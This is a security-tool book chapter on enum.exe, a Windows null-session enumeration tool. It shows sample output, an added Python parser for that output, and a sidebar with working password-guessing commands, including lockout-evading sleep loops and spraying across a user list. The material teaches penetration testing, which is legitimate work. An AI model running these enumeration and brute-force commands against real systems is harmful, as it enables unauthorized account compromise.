Enum




Enum queries a target Windows NT, 2000, or XP system for information about users, groups, shares, password policy, and basic system details. One of the best aspects of enum is that it comes with source code. So if you find a bit of functionality missing, you can break out your copy of Stroustrup’s book on C++ and open up enum.cpp in vi. enum.cpp is available at http://razor.bindview.com/tools/desc/enum_readme.html.

Implementation

Even though enum comes with source code, a ready-to-go binary is also included. It uses native Windows functions so you do not have to carry any extra dynamic-link libraries (DLLs) with the tool. Whenever you see TCP port 139 or 445 open on a Windows system, unleash enum:

C:\>enum.exe
Usage:  enum.exe  [switches]  [hostname|ip]

The table explains the various options:

  Option   Description
  ------   -----------------------------------------------
  -U       Gets userlist
  -M       Gets machine list
  -N       Gets namelist dump (different from -U|-M)
  -S       Gets sharelist
  -P       Gets password policy information
  -G       Gets group and member list
  -L       Gets LSA policy information
  -D       Performs a dictionary crack; needs -u and -f
  -d       Be detailed; applies to -U and -S
  -c       Don't cancel sessions
  -u       Specifies username to use (default "")
  -p       Specifies password to use (default "")
  -f       Specifies dictfile to use (wants -D)

The first seven options return a wealth of information about the target, provided the IPC$ share is available over port 139 or port 445. By default, enum connects over a null session, that is, an anonymous connection to IPC$ with an empty username and password. You can specify all seven options at once, but we’ll break them down a bit to make the output more readable. Combine the -UPG options to gather user-related information:

C:\>enum -UPG 192.168.0.139
server: 192.168.0.139
setting up session... success.
password policy:
  min length: none
  min age: none
  max age: 42 days
  lockout threshold: none
  lockout duration: 30 mins
  lockout reset: 30 mins
getting user list (pass 1, index 0)... success, got 5.
  Administrator  Guest  IUSR_ALPHA  IWAM_ALPHA  TsInternetUser
Group: Administrators
ALPHA\Administrator
Group: Guests
ALPHA\Guest
ALPHA\TsInternetUser
ALPHA\IUSR_ALPHA
ALPHA\IWAM_ALPHA
Group: Power Users
cleaning up... success.

The password policy lines (no minimum length, no lockout threshold) suggest that this system would be an excellent target for password guessing: no lockout threshold has been set for incorrect passwords. We also infer from the user list that Internet Information Server (IIS) (IUSR_ALPHA, IWAM_ALPHA) and Terminal Services (TsInternetUser) are installed on the system.

Combine the -MNS options to gather server-related information:

C:\>enum.exe -MNS 10.192.0.139
server: 10.192.0.139
setting up session... success.
getting namelist (pass 1)... got 5, 0 left:
  Administrator  Guest  IUSR_ALPHA  IWAM_ALPHA  TsInternetUser
enumerating shares (pass 1)... got 3 shares, 0 left:
  IPC$  ADMIN$  C$
getting machine list (pass 1, index 0)... success, got 0.
cleaning up... success.

These options also return the list of users, and they reveal file shares. In this case, only the default shares are present; however, we can make an educated guess that the system has only one hard drive: C$. Remember that it also had IIS installed. This implies that the web document root is stored on the same drive letter as C:\Winnt\System32. That’s a great combination for us to exploit some IIS-specific issues, such as the Unicode directory traversal vulnerability.

Finally, use the -L option to enumerate the Local Security Authority (LSA) information. This returns data about the system and its relationship to a domain:

C:\>enum.exe -L 10.192.0.139
server: 10.192.0.139
setting up session... success.
opening lsa policy... success.
server role: 3 [primary (unknown)]
names:
  netbios: ALPHA
  domain: MOONBASE
quota:
  paged pool limit: 33554432
  nonpaged pool limit: 1048576
  min work set size: 65536
  max work set size: 251658240
  pagefile limit: 0
  time limit: 0
trusted domains:
  indeterminate
netlogon done by a PDC server
cleaning up... success.

We now know that the system name is ALPHA and it belongs to the domain MOONBASE.
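Reading these dumps by eye does not scale across a subnet, so the following added example (not part of enum or the book) parses the text enum prints for -U, -N, -P, -G, -S and -L into a record and writes out the same observations the chapter draws from it: no lockout threshold, IIS and Terminal Services accounts, drive shares, NetBIOS name and domain. The sample input is constructed from the runs shown above, one field per line as enum prints them; the same parser handles the -P output in the password-guessing case study below, where the policy fields are numeric. The account-name-to-service mapping (IUSR_, IWAM_, TsInternetUser) is the chapter's own inference, written down as a table.

```python
"""Parse enum.exe output into a record and derive the observations the chapter
makes by eye.  Added example, not part of enum or the book; the sample is
constructed from the runs shown on this page, one field per line."""
import re

# Constructed sample: the -UPG, -MNS and -L runs against 192.168.0.139, joined.
SAMPLE = r"""
server: 192.168.0.139
setting up session... success.
password policy:
  min length: none
  max age: 42 days
  lockout threshold: none
getting user list (pass 1, index 0)... success, got 5.
  Administrator  Guest  IUSR_ALPHA  IWAM_ALPHA  TsInternetUser
Group: Administrators
ALPHA\Administrator
Group: Guests
ALPHA\Guest
ALPHA\TsInternetUser
Group: Power Users
enumerating shares (pass 1)... got 3 shares, 0 left:
  IPC$  ADMIN$  C$
opening lsa policy... success.
names:
  netbios: ALPHA
  domain: MOONBASE
trusted domains:
  indeterminate
netlogon done by a PDC server
cleaning up... success.
"""

# Well-known account names and the service whose presence they reveal.
SERVICE_HINTS = {
    "IUSR_": "IIS anonymous web account",
    "IWAM_": "IIS out-of-process application account",
    "TsInternetUser": "Terminal Services Internet Connector",
}

def parse_enum_output(text):
    """enum prints an unindented header, then indented data lines (group
    members are the exception: unindented, terminated by the next header)."""
    rec = {"server": None, "policy": {}, "names": {},
           "users": [], "shares": [], "trusted": [], "groups": {}}
    section = group = None
    for raw in text.splitlines():
        line, indented = raw.strip(), raw.startswith(" ")
        if not line:
            continue
        if line.startswith("server:"):
            rec["server"] = line.split(":", 1)[1].strip()
        elif line.startswith("password policy:"):
            section = "policy"
        elif line.startswith(("getting user list", "getting namelist")):
            section = "users"
        elif line.startswith("enumerating shares"):
            section = "shares"
        elif line in ("names:", "trusted domains:"):
            section = line.split()[0].rstrip(":")     # names / trusted
        elif line.startswith("Group:"):
            group = line.split(":", 1)[1].strip()
            rec["groups"][group] = []
            section = "group"
        elif "..." in line or (section != "group" and not indented):
            section = None                            # progress line or unknown header
        elif section == "group":
            rec["groups"][group].append(line)
        elif section in ("policy", "names"):
            key, _, val = line.partition(":")
            rec[section][key.strip()] = val.strip()
        elif section in ("users", "shares", "trusted"):
            rec[section].extend(line.split())
    return rec

def policy_int(rec, key):
    """Numeric value of a password-policy field, or None when enum says 'none'."""
    match = re.match(r"\d+", rec["policy"].get(key, "none"))
    return int(match.group()) if match else None

def findings(rec):
    """The conclusions the chapter draws from the raw output, as short notes."""
    out = []
    if policy_int(rec, "lockout threshold") is None:
        out.append("no lockout threshold: failed logons are never rate-limited")
    if policy_int(rec, "min length") is None:
        out.append("no minimum password length")
    for user in rec["users"]:
        for prefix, service in SERVICE_HINTS.items():
            if user.startswith(prefix):
                out.append(f"{user}: {service} installed")
    drives = [s for s in rec["shares"] if re.fullmatch(r"[A-Z]\$", s)]
    if drives:
        out.append("drive shares: " + ", ".join(drives))
    if rec["names"].get("domain"):
        out.append(f"{rec['names'].get('netbios')} is in domain {rec['names']['domain']}")
    return out

if __name__ == "__main__":
    for note in findings(parse_enum_output(SAMPLE)):
        print(note)
```

Feed it the saved output of a real run (enum -UMNSPGL host > host.txt) instead of SAMPLE; progress lines such as "cleaning up... success." close the current block, so the -U, -S and -L blocks can appear in any order.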

You may often find that the Administrator account has no password. This happens when the administrator flies through the install process and forgets to assign a strong password, or when the administrator assumes that the domain administrator account’s password is strong enough. Use the -u and -p options to specify a particular user’s credentials:

C:\>enum -UMNSPGL -u administrator -p "" 192.168.0.184

Tip

Many organizations rename the Administrator account and then rename the Guest account to “Administrator.” The impatient hacker who doesn’t find the true administrator will be wasting her time. Check for a SID ending in -500, the relative identifier of the built-in Administrator account, which a rename does not change.

Enum used to be one of the few tools that enabled brute-force password guessing against Windows systems; however, you may be more interested in Hydra (Chapter 8) for brute-force testing.

start sidebar
Case Study: Password Guessing

Enum's username and password feature lends itself to a rudimentary brute-force password guessing tool, but it also includes the -f option to make things easy. The -P option returns the password policy information of the target. This includes the lockout period and the number of invalid logins before Windows locks the account. You should always take a look at this before trying to break an account:

C:\>enum -P 192.168.0.36
server: 192.168.0.36
setting up session... success.
password policy:
  min length: 7
  min age: 2 days
  max age: 42 days
  lockout threshold: 5
  lockout duration: 30 mins
  lockout reset: 30 mins
cleaning up... success.

Use this information to customize a brute-force attack.

Note that, by design, the Administrator account cannot be locked by failed password attempts. Use passprop /adminlockout from the Resource Kit if you want to enforce the lockout policy for the administrator. If no account lockouts are applied, the test is simple; tailor the dictionary to the target. In this example, no passwords can be shorter than seven characters (although the administrator can always set an arbitrary password), so you would remove words with six characters or fewer from your dictionary.

C:\>enum -D -u Administrator -f dict.txt 192.168.0.36

This launches a relatively speedy attack against the Administrator account. If you try to break any other user's account, you'll have to pay more attention to the lockout threshold. An approach that works around a limit of five invalid logins and a period of 30 minutes requires Cygwin or the Resource Kit tools (for the sleep command):

C:\>for /F %p in (dict.txt) do enum -u Istari -p %p -M 192.168.0.36 >> output.txt && sleep 180s

(At an interactive prompt the loop variable is written %p; inside a batch file, double the percent sign to %%p.)

As you can see, lockout policies severely impact a brute-force attack. However, we can alter our methodology by targeting multiple user accounts to speed up the process. Use the -G option to identify users in the Administrators group or any particular group you wish to target:

C:\>enum -G 192.168.0.36

Then launch the brute force against those accounts. Place the account names in a file called users.txt. If you have a large enough user base to test, you won't have to worry about locking out an account.

C:\>for /F %p in (dict.txt) do for /F %u in (users.txt) do enum -u %u -p %p -M 192.168.0.36 >> output.txt

With this technique, the users.txt file should be large and the dict.txt file (the password list) should be small. This roots out accounts with trivial passwords such as password, changeme, or pass123. For a more robust brute-force tool, check out THC-Hydra in Chapter 8.

end sidebar



Anti-Hacker Tool Kit, Third Edition
ISBN: 0072262877
Year: 2004
Pages: 189